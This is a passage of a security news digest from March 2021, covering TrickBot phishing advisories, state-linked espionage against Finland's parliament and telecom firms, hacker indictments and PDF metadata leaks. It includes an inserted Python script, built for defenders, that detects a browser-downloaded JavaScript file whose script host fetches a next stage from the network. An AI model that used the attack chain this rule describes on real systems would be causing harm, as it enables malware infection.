“The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.” reads the advisory.
TrickBot is a popular banking Trojan that has been around since October 2016; its authors have continuously upgraded it with new features.
In October, Microsoft’s Defender team, FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT, and Broadcom’s cyber-security division Symantec joined forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.
Although Microsoft and its partners brought down the TrickBot infrastructure, its operators attempted to resume operations by setting up new command and control (C&C) servers.
Following the takedown, the operators behind the TrickBot malware have implemented several improvements to make it more resilient.
A few days after the TrickBot takedown, Netscout researchers spotted a new TrickBot Linux variant that was used by its operators.
Security researchers also reported that the botnet was used to spread other threats, such as Ryuk ransomware, Conti ransomware, and also an Emotet downloader.
“CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation.” continues the report. “In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system.”
Upon clicking on the image hosted on the compromised website, a malicious JavaScript file is downloaded and run, then the malicious code connects to the attackers’ C2 server to fetch and execute the bot on the victim’s machine.
The joint advisory includes Indicators of Compromise (IoCs) and mitigations for these attacks.
Russian Man Pleads Guilty to Role in Attempt to Plant Malware on Tesla Systems
20.3.2021 BigBrothers Securityweek
The Russian national who attempted to convince a Tesla employee to plant malware on the company’s computers has pleaded guilty, the U.S. Justice Department announced on Thursday.
Egor Igorevich Kriuchkov, 27, has pleaded guilty to one count of conspiracy to intentionally cause damage to a protected computer. He initially faced up to five years in prison, but he will likely get a lighter sentence as a result of his plea agreement.
Kriuchkov is accused of conspiring with others to convince an employee of Tesla to plant malware on the electric car maker’s network as part of a ransomware attack. They had also planned on launching a DDoS attack to distract the company while the malware allowed them to steal valuable data.
The Russian traveled to the U.S. in July 2020 on a tourist visa and contacted the targeted Tesla employee, who was located in Nevada, shortly after.
The employee was initially offered $500,000 for his assistance, but the offer was later doubled. Even so, the employee decided to inform Tesla about the cybercriminals’ plan and the company notified the FBI, which organized a sting operation.
Kriuchkov was arrested in August 2020 and in September he pleaded not guilty. He will be sentenced on May 10.
Prime Minister Boris Johnson wants to enhance UK cyber capabilities
19.3.2021 BigBrothers Securityaffairs
Prime Minister Boris Johnson declared that Britain needs to boost its cyber capability to conduct cyber attacks on foreign hostile actors.
Prime Minister Boris Johnson said that his government needs to boost its capability to conduct cyber attacks on foreign threat actors.
“Cyber power is revolutionising the way we live our lives and fight our wars, just as air power did 100 years ago,” Johnson said in a statement released by his office and reported by the Reuters agency.
The announcement comes ahead of the presentation of a long-term review of national security strategy to parliament on Tuesday which could lead to a reduction in armed forces personnel.
Prime Minister Boris Johnson recognizes the importance of protecting his country from attacks originating in cyberspace, a new domain of warfare.
“The review will set out the importance of cyber technology to our way of life – whether it’s defeating our enemies on the battlefield, making the internet a safer place or developing cutting-edge tech to improve people’s lives,” continues Johnson’s statement.
In 2019, the UK government spent 2.1% of national income, roughly $59 billion, on defence, more than any other European country.
Johnson has yet to confirm the cuts to defence personnel; he only confirmed that the National Cyber Force would have a permanent base in northern England as the government tries to boost regional development outside London.
The National Cyber Force (NCF) plays a crucial role in enhancing the UK’s offensive cyber capabilities.
Last year, the UK government announced a new defence spending of £16.5 billion ($22bn), part of which has been assigned to the creation of the National Cyber Force. The British government also reserved part of the spending for the creation of a Space Command and agency dedicated to AI. The NCF is composed of personnel from intelligence, cyber and security agency GCHQ, the MoD, the Secret Intelligence Service (MI6) and the Defence Science and Technology Laboratory (Dstl).
The National Cyber Force will be involved in cyber operations such as:
Interfering with a mobile phone to prevent a terrorist from being able to communicate with their contacts;
Helping to prevent the internet from being used as a global platform for serious crimes, including sexual abuse of children and fraud; and
Keeping UK military aircraft safe from targeting by hostile weapons systems.
US Charges Swiss ‘Hacktivist’ for Data Theft and Leaks
19.3.2021 BigBrothers Securityweek
The Justice Department has charged a Swiss hacker with computer intrusion and identity theft, just over a week after the hacker took credit for helping to break into the online systems of a U.S. security-camera startup.
An indictment against 21-year-old Till Kottmann was brought Thursday by a grand jury in the Seattle-based Western District of Washington.
Federal prosecutors said Thursday that Kottmann, of Lucerne, Switzerland, was initially charged in September. The allegations date back to 2019 and involve stealing credentials and data and publishing source code and proprietary information from more than 100 entities, including companies and government agencies.
Kottmann had described the most recent hack and leak of camera footage from customers of California security-camera provider Verkada as part of a “hacktivist” cause of exposing the dangers of mass surveillance.
Acting U.S. Attorney Tessa Gorman rejected those motives in a statement Thursday.
“These actions can increase vulnerabilities for everyone from large corporations to individual consumers,” Gorman wrote. “Wrapping oneself in an allegedly altruistic motive does not remove the criminal stench from such intrusion, theft, and fraud.”
Kottmann didn’t immediately return an online request for comment Thursday.
Swiss authorities said they had raided Kottmann’s home in Lucerne late last week at the request of U.S. authorities. It’s not clear if U.S. prosecutors intend to extradite Kottmann, who remains in Lucerne and was notified of the pending charges. Prosecutors say the FBI recently seized a website domain that Kottmann used to publish hacked data online.
The indictment ties a number of hacks to Kottmann over the past year, including one targeting an unnamed security device manufacturer based in the Seattle region and another affecting a maker of tactical equipment.
In several cases, prosecutors said Kottmann improperly used valid employee credentials to gain access to source code databases. The indictment says Kottmann also hacked the Washington state Department of Transportation, an automobile manufacturer and a financial investment company.
The indictment doesn’t specifically mention last week’s high-profile hack of Verkada, which drew attention because it exposed live camera feeds and archived video footage from schools, jails, factories, gyms and corporate offices.
Kottmann, who uses they/them pronouns, told The Associated Press last week they belonged to a group nicknamed APT-69420 Arson Cats, a small collective of “primarily queer hackers, not backed by any nations or capital but instead backed by the desire for fun, being gay and a better world.”
Kottmann has previously attracted attention for leaking hacked material to expose security flaws, including from U.S. chipmaker Intel last year.
The indictment attempts to tie Kottmann’s efforts at self-promotion, including designing and selling clothing related to hacking and “anti-intellectual-property ideology,” into part of a broader conspiracy to commit computer fraud.
Finland IDs Hackers Linked to Parliament Spying Attack
19.3.2021 BigBrothers Securityweek
Finland’s domestic security agency said Thursday that the cybergroup APT31, which is generally linked to the Chinese government, was likely behind a cyberspying attack on the information systems of the Nordic country’s parliament.
The Finnish Security and Intelligence Service, known by the abbreviation Supo, said it had “identified a cyber espionage operation targeted in 2020 against parliament with the aim of intruding into parliament’s IT systems.”
The agency added that “according to Supo intelligence, APT31 was responsible for the attack”. It didn’t mention China by name or the group’s alleged links to the government in Beijing. The statement was also posted in English on the agency’s Twitter account.
Finland’s National Bureau of Investigation, NBI, said late December that it had started an investigation into suspected gross hacking and espionage attacks on the information systems of Eduskunta, the Finnish legislature. Among other things, some lawmakers’ email accounts were compromised.
Parliament has since upgraded the systems’ security features.
NBI’s Tero Muurman, who is in charge of the investigation, said Thursday his agency was probing further Supo’s allegation of APT31’s involvement. He said the breach likely aimed to “acquire information for the benefit of a foreign nation or to harm Finland.”
FireEye, one of the world’s major cybersecurity firms, and other data security firms have linked APT31 to the Chinese government or operations conducted on its orders.
APT is an abbreviation for “advanced persistent threat,” a general term to describe an attack in which an intruder — or intruders — establishes an illicit and usually long-term presence on a network to acquire highly sensitive data.
Earlier this month, Supo said that the intelligence services of foreign powers have expanded their cyber espionage operations in Finland during the COVID-19 pandemic through either directly targeting Finnish organizations or using Finnish infrastructure.
The agency has earlier named China and Russia as being the most active countries spying on Finland.
Arctic issues are an area of particular interest to China in the Nordic countries.
The Finnish public broadcaster YLE reported earlier March that the state-funded Polar Research Institute of China attempted in 2018 to buy or lease an airport near the small northern town of Kemijarvi in the Lapland area, Finland’s Arctic region, for research flights over the North Pole and other Arctic regions. The Finnish military, however, blocked the deal on security concerns, as the airport is close to a military area.
The parliament of Norway, Finland’s Nordic neighbor, was hit by a cyberattack last year that the country’s domestic security agency said was probably done by the hacking group APT28, which has been linked to Russia’s GRU military intelligence agency.
Five Months After Takedown Attempt, CISA and FBI Warn of Ongoing TrickBot Attacks
19.3.2021 BigBrothers Securityweek
Attacks employing the TrickBot malware continue, leveraging phishing emails as the initial infection vector, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) warn.
In a joint advisory published on Wednesday, the two agencies revealed that a sophisticated group of cybercrime actors is leveraging a traffic infringement phishing scheme to lure victims into downloading the TrickBot malware.
Initially observed in 2016 and believed to be the work of the threat actors behind the Dyre Trojan, TrickBot has become one of the most prevalent malware families out there, ensnaring machines into a botnet that was being offered under a malware-as-a-service model to both nation-states and cyber-crime groups.
In October 2020, Microsoft announced the takedown of the infrastructure behind TrickBot, but the malware survived the attempt. In fact, weeks later, it received several updates that increased its resilience against similar attempts and also provided it further compromise capabilities.
Now, CISA and the FBI reveal they have observed “continued targeting through spearphishing campaigns using TrickBot malware in North America,” thus confirming that TrickBot’s operators were able to restore their malicious operation.
“CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation,” the joint advisory reads.
Once the victim clicks on the image, however, a malicious JavaScript file is downloaded. When executed, the file connects to the attackers’ command and control (C&C) server to fetch and run TrickBot on the victim’s system.
A modular piece of malware, TrickBot is capable of stealing information from victims’ browsers, spreading laterally across the network, gathering system information, manipulating system data, exfiltrating information, mining crypto-currency, searching for vulnerabilities in system firmware, and dropping additional payloads onto the system, such as Emotet or the Ryuk and Conti ransomware.
In their joint advisory, CISA and FBI included a series of recommendations for network defenders looking to improve their security posture and stay better protected against TrickBot attacks. The recommendations apply to security teams at federal, state, local, tribal, and territorial governments, but also to those in the private sector.
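Both TrickBot articles above describe the same delivery chain: a phishing link to a compromised site, a "photo proof" that is really a JavaScript file, and a script that, once opened, contacts the C2 server to fetch TrickBot. The following is an added example, not code from the advisory or from either article, of how a defender can correlate endpoint telemetry to surface that chain instead of alerting on any script host with network activity. All event field names (ts, type, pid, image, target, cmdline, dest_ip, dest_port) and all sample values are constructed for the example and are not real telemetry or indicators from the advisory.

```python
"""Correlate constructed endpoint telemetry to surface the TrickBot delivery chain:
a browser saves a .js 'photo proof', a Windows script host opens it, and that script
host immediately reaches out to the network for the next stage.

Added example; not the advisory's or either article's code. Event fields and all
sample values below are constructed, not real telemetry.
"""
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WINDOW = timedelta(minutes=10)  # how long after the download the follow-on steps still count

# Constructed sample events, modelled loosely on file-create / process-create /
# network-connect endpoint records. The first three form the malicious chain; the
# last two are a legitimate logon script that a naive "script host talks to the
# network" rule would flag, but this correlation does not.
EVENTS = [
    {"ts": "2021-03-17T09:00:01", "type": "file_create", "pid": 4100, "image": "msedge.exe",
     "target": r"C:\Users\alice\Downloads\photo_proof_violation.js"},
    {"ts": "2021-03-17T09:00:09", "type": "process_create", "pid": 5230, "image": "wscript.exe",
     "parent_image": "explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\photo_proof_violation.js"'},
    {"ts": "2021-03-17T09:00:11", "type": "network_connect", "pid": 5230, "image": "wscript.exe",
     "dest_ip": "203.0.113.45", "dest_port": 443},
    {"ts": "2021-03-17T09:05:00", "type": "process_create", "pid": 6001, "image": "cscript.exe",
     "parent_image": "userinit.exe", "cmdline": r"cscript.exe \\corp\netlogon\map_drives.js"},
    {"ts": "2021-03-17T09:05:02", "type": "network_connect", "pid": 6001, "image": "cscript.exe",
     "dest_ip": "10.0.0.12", "dest_port": 445},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_script_download_chain(events, window=WINDOW):
    """Return one alert per (.js download -> script host opens it -> network connect) chain."""
    downloads = {}      # lower-cased path of a browser-written .js -> its file_create event
    script_hosts = {}   # pid of a script host that opened such a file -> (process event, download)
    alerts = []
    for ev in sorted(events, key=_ts):
        kind = ev["type"]
        if kind == "file_create":
            # Step 1: a browser writes a .js file to disk (the 'photo proof').
            if ev["image"].lower() in BROWSERS and ev["target"].lower().endswith(".js"):
                downloads[ev["target"].lower()] = ev
        elif kind == "process_create":
            # Step 2: wscript/cscript is started with that downloaded file on its command line.
            if ev["image"].lower() in SCRIPT_HOSTS:
                cmd = ev["cmdline"].lower()
                for path, dl in downloads.items():
                    if path in cmd and _ts(ev) - _ts(dl) <= window:
                        script_hosts[ev["pid"]] = (ev, dl)
        elif kind == "network_connect":
            # Step 3: that script host process opens a network connection (stage-two fetch).
            if ev["pid"] in script_hosts:
                proc, dl = script_hosts[ev["pid"]]
                if _ts(ev) - _ts(proc) <= window:
                    alerts.append({
                        "rule": "browser_js_download_scripthost_network",
                        "downloaded_by": dl["image"],
                        "script": dl["target"],
                        "script_pid": proc["pid"],
                        "script_host": proc["image"],
                        "dest": f'{ev["dest_ip"]}:{ev["dest_port"]}',
                        "seconds_from_download_to_connect": int((_ts(ev) - _ts(dl)).total_seconds()),
                    })
    return alerts


if __name__ == "__main__":
    for alert in detect_script_download_chain(EVENTS):
        print(alert)
```

Tying the three steps together by file path and process id is what keeps the false-positive rate manageable: script hosts legitimately run logon and management scripts that also touch the network, but those scripts do not arrive as browser downloads minutes earlier. The time window is a tunable assumption; the advisory's own IoCs and mitigations remain the authoritative reference for blocking known infrastructure.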
U.S. Says Russia, Iran Attempted Interference in 2020 Presidential Election
19.3.2021 BigBrothers Securityweek
A declassified joint report from several United States agencies assesses that Russian and Iranian threat actors did attempt to meddle in the 2020 U.S. presidential election, but claims that the technical integrity of the voting process wasn’t affected.
The declassified version of the report includes key judgments from the classified report to the president, but without full supporting information and without providing details on specific intelligence methods, reports, and sources.
The joint report is meant to provide information on the extent to which foreign actors attempted interference with the 2020 U.S. elections, along with details on whether these adversaries targeted political organizations, campaigns, or election candidates, and an assessment on whether the attacks were able to successfully compromise the targeted infrastructure.
Without attempting to assess the effect of foreign interference on public perception or on the behavior of voters, the joint report reveals that there’s no evidence that foreign government-affiliated actors were able to prevent or alter votes, disrupt the ability to tally votes or deliver election results, or compromise the integrity of voter registration information.
However, Russian and Iranian adversaries did target critical infrastructure sectors and successfully compromised “the security of several networks that managed some election functions.” The integrity of voter data and the technical aspect of the voting process, however, were not impacted.
“We identified several incidents when Russian, Chinese, and Iranian government-affiliated actors materially impacted the security of networks associated with or pertaining to US political organizations, candidates, and campaigns during 2020 federal elections,” the Department of Justice (DOJ) and the Department of Homeland Security (DHS) say.
According to the report, the Kremlin authorized influence operations that sought to denigrate President Biden’s candidacy, undermine people’s confidence in the election process, or support former President Trump. However, there were no persistent attempts from Russian actors to compromise the election infrastructure, the report reveals.
State-sponsored Iranian threat actors, the report claims, engaged in an influence campaign meant to “undercut former President Trump’s reelection prospects” and undermine confidence in the election process.
China, on the other hand, “did not deploy interference efforts and considered but did not deploy influence efforts intended to change the outcome of the U.S. Presidential election,” the report reads. The reason, the agencies say, was that China was looking to strengthen its relations with the U.S.
Other foreign actors, such as Lebanese Hizballah, Cuba, and Venezuela, also made small attempts to influence the elections, mainly driven by financial reasons. However, they are believed to have failed in their attempts, despite public claims, the report reads.
“We have no evidence—not through intelligence collection on the foreign actors themselves, not through physical security and cybersecurity monitoring of voting systems across the country, not through post-election audits, and not through any other means—that a foreign government or other actors compromised election infrastructure to manipulate election results,” the DoJ and DHS say.
Regardless, the agencies do make a series of recommendations on how to improve the overall resilience of the electoral process to interference attempts, including through cyber and physical security hygiene, management of third-party vendor security and supply-chain risks, and public messaging and education.
Polish State Websites Hacked and Used to Spread False Info
19.3.2021 BigBrothers Securityweek
Two Polish government websites were hacked Wednesday and used briefly to spread false information about a non-existent radioactive threat, in what a Polish government official said had the hallmarks of a Russian cyberattack.
The National Atomic Energy Agency and Health Ministry websites briefly carried claims of a supposed nuclear waste leak coming from neighboring Lithuania and threatening Poland.
In addition, the Twitter account of a journalist who often writes about Russian and eastern European affairs was also hacked and used to further spread the information.
Stanislaw Zaryn, spokesman for the head of the country’s security services, told The Associated Press that “the whole story looked like a typical Russian attempt” to sow suspicion and division among Western allies.
Zaryn said it recalled a similar hacking attempt in 2020 which spread false information about a non-existent radioactive cloud heading to Poland from Chernobyl in Ukraine — the site of a nuclear disaster in the 1980s.
Wednesday’s false statement warned that the health and lives of Polish people living in an area close to the Lithuanian border were in danger. But the messages apparently did not receive much notice.
State-sponsored Threat Groups Target Telcos, Steal 5G Secrets
18.3.2021 BigBrothers Threatpost
Researchers say China-linked APTs lure victims with bogus Huawei career pages in what they dub ‘Operation Diànxùn’.
Chinese-language APTs are targeting telecom companies in cyberespionage campaigns aimed at stealing sensitive data and trade secrets tied to 5G technology, according to researchers.
The campaigns, dubbed “Operation Diànxùn”, target and lure victims working in the telecom industry. A typical ploy includes a fake website designed to mimic telecom giant Huawei’s career page.
“While the initial vector for the infection is not entirely clear, [we believe] with a medium level of confidence that victims were lured to a domain under control of the threat actor, from which they were infected with malware,” according to McAfee researchers in a Tuesday report.
Given the tactics used in the campaign, researchers surmised it to be the work of known Chinese-language APTs RedDelta and Mustang Panda. RedDelta was last believed to be behind cyberattacks against the Vatican and other Catholic Church-related institutions last year. In those attacks, adversaries leveraged spear phishing emails laced with malware that ultimately pushed the PlugX remote access tool (RAT) as the final payload.
Meanwhile, Mustang Panda has been linked to cyberespionage attacks on non-governmental organizations (NGOs) with a focus on gathering intelligence on Mongolia by using shared malware like Poison Ivy or PlugX. The group also is known to shift tactics and adopt new tools quickly, researchers have noted.
This time around, the groups seem to be gunning for sensitive data and aiming “to spy on companies related to 5G technology,” researchers wrote. The campaign is likely related to a number of countries’ decision to ban the use of Chinese equipment from Huawei in the global rollout of the next-generation wireless telecommunications technology, researchers suggested.
The APTs used a multi-phased approach to the attacks, with the initial delivery vector likely coming in the form of a phishing attack using the internet as the first point of contact with victims, researchers said with “a medium level of confidence.”
Once someone falls for this aspect of the campaign, the second phase executes a .NET payload on the victim’s endpoint, delivered through malicious Flash-based artifacts, according to the report.
“While the execution of the initial fake Flash installer acts mainly like a downloader, the [.NET] payload contains several functions and acts as a utility to further compromise the machine,” researchers wrote. “This is a tool to manage and download backdoors to the machine and configure persistence.”
In the third and final phase of the attack, threat actors create a backdoor for remote control of the victim via a command and control server and a Cobalt Strike Beacon, according to the report.
Researchers recommend “an adaptive and integrated security architecture” to defend against multi-layered attacks such as Diànxùn, “which will make it harder for threat actors to succeed and increase resilience in the business.”
China-linked hackers target telcos to steal 5G secrets
18.3.2021 BigBrothers Securityaffairs
Chinese APT groups are targeting telecom companies in cyberespionage campaigns collectively tracked as Operation Diànxùn, to steal 5G secrets.
Chinese-language threat actors are targeting telecom companies, as part of a cyber espionage campaign tracked as ‘Operation Diànxùn,’ to steal sensitive data and trade secrets tied to 5G technology.
Hackers behind these campaigns are targeting people working in the telecom industry. In some attacks, threat actors set up a fake website designed to mimic telecom giant Huawei’s career page.
According to the researchers, the tactics, techniques and procedures (TTPs) used in the campaign are compatible with the operations associated with Chinese RedDelta and Mustang Panda cyberespionage groups.
“While the initial vector for the infection is not entirely clear, the McAfee ATR team believes with a medium level of confidence that victims were lured to a domain under control of the threat actor, from which they were infected with malware which the threat actor leveraged to perform additional discovery and data collection.” reads the report published by McAfee. “It is our belief that the attackers used a phishing website masquerading as the Huawei company career page.”.
RedDelta was suspected to be behind the attacks against the Vatican and other Catholic Church-related institutions in 2020; the group employed the PlugX RAT to compromise the victims’ systems.
Mustang Panda past operations include attacks on NGOs, the group used malware commonly associated with China-linked APT groups, such as Poison Ivy or PlugX.
The cyber espionage campaign is aligned with the interests of the Chinese government; it focuses on the adoption of Chinese 5G technology by multiple countries worldwide.
Attackers used a .NET payload as second-stage malware, delivered by tricking victims into executing malicious Flash-based artifacts.
“While the execution of the initial fake Flash installer acts mainly like a downloader, the [.NET] payload contains several functions and acts as a utility to further compromise the machine,” continues the report. “This is a tool to manage and download backdoors to the machine and configure persistence.”
In the final stage, attackers deploy a backdoor to take over the victim’s system.
Chinese Cyberspies Target Telecom Companies in America, Asia, Europe
18.3.2021 BigBrothers Securityweek
China-linked cyber-espionage group Mustang Panda is targeting telecommunications companies in Asia, Europe, and the United States for espionage purposes, according to a warning from security researchers at McAfee.
Also referred to as RedDelta and TA416, the threat actor has been previously associated with the targeting of entities in connection with the Vatican - Chinese Communist Party diplomatic relations, along with some entities in Myanmar.
The new malware attacks, McAfee says, employ the same tactics, techniques and procedures (TTPs) previously associated with Mustang Panda. The initial vector of infection hasn’t been identified, but the researchers believe that victims were being lured to a fake website crafted to mimic the legitimate career site for Chinese tech giant Huawei.
The first stage of the attack leverages a fake Flash application and a phishing page mimicking the original website, while the second stage is a .NET payload executed to further compromise the machine by downloading and managing backdoors. A Cobalt Strike beacon payload is delivered as a third stage.
Referred to collectively as Operation Diànxùn, the new attacks targeted telecommunication companies based in Southeast Asia, Europe, and the United States. The adversary, McAfee says, shows strong interest in German, Vietnamese, and Indian telecommunication companies.
“Combined with the use of the fake Huawei site, we believe with a high level of confidence that this campaign was targeting the telecommunication sector. We believe with a moderate level of confidence that the motivation behind this specific campaign has to do with the ban of Chinese technology in the global 5G roll-out,” McAfee says.
The campaign, the researchers note, is believed to have been aimed at the theft of sensitive or secret information related to 5G technology. McAfee also notes that it has no evidence that Huawei was knowingly involved in these attacks.
Russia Threatens to Block Twitter in a Month
17.3.2021 BigBrothers Securityweek
Russian authorities said Tuesday they would block Twitter in a month if it doesn’t take steps to remove banned content, a move that escalates the Russian government’s drawn-out standoff with social media platforms that have played a major role in amplifying dissent in Russia.
Russia’s state communications watchdog, Roskomnadzor, last week announced it was slowing down the speed of uploading photos and videos to Twitter over its alleged failure to remove content encouraging suicide among children and information about drugs and child pornography.
The agency said Twitter has failed to remove more than 3,000 posts with banned content, including more than 2,500 posts encouraging suicide among minors. The platform responded by emphasizing its policy of zero tolerance for child sexual exploitation, promotion of suicide and drug sales.
On Tuesday, deputy chief of Roskomnadzor Vadim Subbotin argued that Twitter still wasn’t complying with the demands of the Russian authorities.
“Twitter doesn’t react to our requests appropriately, and if things go on like this, then in a month it will be blocked, on an out-of-court basis,” Subbotin told the Interfax news agency. He added that Roskomnadzor at this point “is not registering specific steps by Twitter to remove prohibited content.”
Twitter did not respond immediately to an email request for comment.
Authorities have criticized social media platforms that have been used to bring tens of thousands of people into the streets across Russia this year to demand the release of jailed Russian opposition leader Alexei Navalny. The wave of demonstrations was the largest in years and posed a major challenge to the Kremlin.
The authorities alleged social media platforms failed to remove calls for children to join the protests. Russian President Vladimir Putin has urged police to act more to monitor social platforms and to track down those who “draw the children into illegal and unsanctioned street actions.”
The government’s efforts to tighten control of the internet and social media date back to 2012, when a law allowing authorities to blacklist and block certain online content was adopted. Since then, a growing number of restrictions targeting messaging apps, websites and social media platforms have been introduced.
In 2014, authorities adopted a law requiring online services to store the personal data of Russian users on servers in Russia and have since tried to make Facebook and Twitter comply with it. Both companies have been repeatedly fined, first small amounts of around $50 and last year the equivalent of $63,000 each, for not complying.
The government has repeatedly aired threats to block the two social media giants, but stopped short of outright bans even though the law allows it, probably fearing the move would elicit too much public outrage. Only the social network LinkedIn, which wasn’t very popular in Russia, has been banned by the authorities for the failure to store user data in Russia.
However, some experts have said that the authorities might be seriously considering the possibility of bans this time around.
Subbotin said Tuesday that Roskomnadzor has the necessary “technical capabilities” to block Twitter, and that the agency doesn’t rule out slowing down or blocking other online platforms if they “violate Russian laws and don’t comply with Roskomnadzor’s demands.”
In 2018, Roskomnadzor failed to restrict access to the popular messaging app Telegram over its refusal to hand over encryption keys used to scramble messages. Last year, the watchdog officially withdrew the demands to block Telegram, which has been widely used despite the ban, including by government institutions.
US DoJ indicted the CEO of Sky Global encrypted chat platform
16.3.2021 BigBrothers Securityaffairs
The CEO of the encrypted communications firm Sky Global has been indicted in the US on charges of facilitating international drug trafficking.
The head of the Canada-based company Sky Global that provides encrypted communications, Jean-Francois Eap, has been indicted in the US on charges of facilitating international drug trafficking.
The Justice Department indicted Jean-Francois Eap and Thomas Herdman, a former high-level distributor of Sky Global devices.
“A federal grand jury today returned an indictment against the Chief Executive Officer and an associate of the Canada-based firm Sky Global on charges that they knowingly and intentionally participated in a criminal enterprise that facilitated the transnational importation and distribution of narcotics through the sale and service of encrypted communications devices.” reads the press release published by the DoJ.
“Jean-Francois Eap, Sky Global’s Chief Executive Officer, and Thomas Herdman, a former high-level distributor of Sky Global devices, are charged with a conspiracy to violate the federal Racketeer Influenced and Corrupt Organizations Act (RICO).”
The authorities also issued warrants for their arrests the same day.
According to the indictment, Sky Global’s devices are specifically designed to prevent eavesdropping and investigation conducted by the police on criminal activities of members of transnational organizations involved in drug trafficking and money laundering.
One of the features implemented by Sky Global in its devices consists of the remote wipe of the messages in case of seizure by law enforcement.
Sky Global software is available for iPhone, Google Pixel, Blackberry, and Nokia devices. The software allows the devices to communicate with each other by routing communications through a closed network managed by the firm, whose servers are located in Canada and France.
At least 70,000 Sky Global devices are used worldwide, including in the United States.
“According to the indictment, Sky Global’s purpose was to create, maintain, and control a method of secure communication to facilitate the importation, exportation, and distribution of heroin, cocaine and methamphetamine into Australia, Asia, Europe, and North America, including the United States and Canada; to launder the proceeds of such drug trafficking conduct; and to obstruct investigations of drug trafficking and money laundering organizations by creating, maintaining, and controlling a system whereby Sky Global would remotely delete evidence of such activities.” continues the DoJ.
Last week, a joint operation conducted by European police forces and coordinated by Europol led to the arrest of at least 80 people after the shutdown of Sky Global’s Sky ECC encrypted phone network, which was used by organized crime groups.
The police claimed to have compromised the Sky ECC network and eavesdropped on suspects’ communications.
According to the indictment, Sky Global employees allowed their customers to pay using digital currencies (e.g., Bitcoin) in order to anonymize the illegal transactions and protect the customers’ identities.
“According to the indictment, Sky Global employees also set up and maintained shell companies to hide the proceeds generated by selling its encryption services and devices.” states DoJ.
“The indictment alleges that Sky Global generated hundreds of millions of dollars providing a service that allowed criminal networks around the world to hide their international drug trafficking activity from law enforcement,” said Acting U.S. Attorney Randy Grossman. “Companies who do this are perpetuating the deadliest drug epidemic in our nation’s history. This groundbreaking investigation should send a serious message to companies who think they can aid criminals in their unlawful activities. I want to thank the prosecutors on this case, Meghan Heesch and Joshua Mellor, as well as our federal law enforcement partners at the FBI, DEA, IRS and the U.S. Marshals Service, for their excellent work on this case.”
Swiss Police Raid Over Hack on U.S. Security-Camera Company
16.3.2021 BigBrothers Securityweek
Swiss authorities on Monday confirmed a police raid at the home of a Swiss software engineer who took credit for helping to break into a U.S. security-camera company’s online networks, part of what the activist hacker cited as an effort to raise awareness about the dangers of mass surveillance.
The Federal Office of Justice said regional police in central Lucerne, acting on a legal assistance request from U.S. authorities, on Friday carried out a house search involving hacker Tillie Kottmann.
The hacker said online that electronics devices were seized during the raid. The Swiss office declined to specify the location or comment further, deferring all questions to “the relevant U.S. authority.”
The FBI said in a statement Friday it was “aware of the law enforcement activity conducted in Switzerland” but had no further comment.
Kottmann had identified as a member of a group of “hacktivists” who say they were able to view live camera feeds and peer into hospitals, schools, factories, jails and corporate offices for much of Monday and Tuesday last week after gaining access to the systems of California startup Verkada. They said the action was aimed at raising awareness about mass surveillance.
Verkada later locked them out by disabling all internal administrator accounts that the hackers had accessed using valid credentials found online. The company alerted law enforcement and its customers.
Kottmann, who uses they/them pronouns, said on the social media site Mastodon last week that the raid wasn’t specifically about the Verkada hack but was tied to an earlier FBI investigation. Kottmann has previously attracted attention for leaking hacked material to expose security flaws, including from U.S. chipmaker Intel last year.
It’s common for professional cybersecurity researchers to probe online systems for security flaws, though “hacktivists” often take that a step further by publicly exposing security risks or leaked materials to effect social change.
Kottmann didn’t immediately return requests for comment.
Verkada, based in San Mateo, California, has pitched its cloud-based surveillance service as part of the next generation of workplace security. Its software detects when people are in the camera’s view, and a “Person History” feature enables customers to recognize and track individual faces and other attributes, such as clothing color and likely gender. Not all customers use the facial recognition feature.
Research: Security Agencies Expose Information via Improperly Sanitized PDFs
16.3.2021 BigBrothers Securityweek
Most security agencies fail to properly sanitize Portable Document Format (PDF) files before publishing them, thus exposing potentially sensitive information and opening the door for attacks, researchers have discovered.
An analysis of roughly 40,000 PDFs published by 75 security agencies in 47 countries has revealed that these files can be used to identify employees who use outdated software, according to Supriya Adhatarao and Cédric Lauradoux, two researchers with the University Grenoble Alpes and France’s National Institute for Research in Computer Science and Automation (Inria).
The analysis also revealed that the adoption of sanitization within security agencies is rather low, as only 7 of them used it to remove hidden sensitive information from some of their published PDF files. What’s more, 65% of the sanitized files still contained hidden data.
“Some agencies are using weak sanitization techniques: it requires removing all the hidden sensitive information from the file and not just removing the data at the surface. Security agencies need to change their sanitization methods,” the academic researchers say.
PDF files, the researchers note, represent collections of indirect objects (eight types of objects: arrays, boolean, dictionaries, names, numbers, streams, strings, and the null object) that are used to store data. These objects may include hidden data not visible when viewing the PDF.
Per the NSA, there are 11 main types of hidden data in PDF files, namely metadata; embedded content and attached files; scripts; hidden layers; embedded search index; stored interactive form data; reviewing and commenting; hidden page, image and update data; obscured text and images; PDF comments that are not displayed; and unreferenced data.
Metadata associated with images embedded in a PDF file can be used to gather information about the author, as can comments and annotations that weren’t removed before publishing, and the document’s own PDF metadata.
There are several tools that can be used for sanitizing PDF files, including Adobe’s Acrobat, and there are four levels of sanitization: Level-0: full metadata (no sanitization), Level-1: partial metadata, Level-2: no metadata, and Level-3: properly cleaned files (full sanitization, with all objects having been removed).
For their research, the academics used a set of 39,664 PDF files. Of these, 1,783 (4%) were found to include author name, 30,155 (76%) contained metadata on the PDF producer tool, and 16,805 (42%) revealed the operating system used.
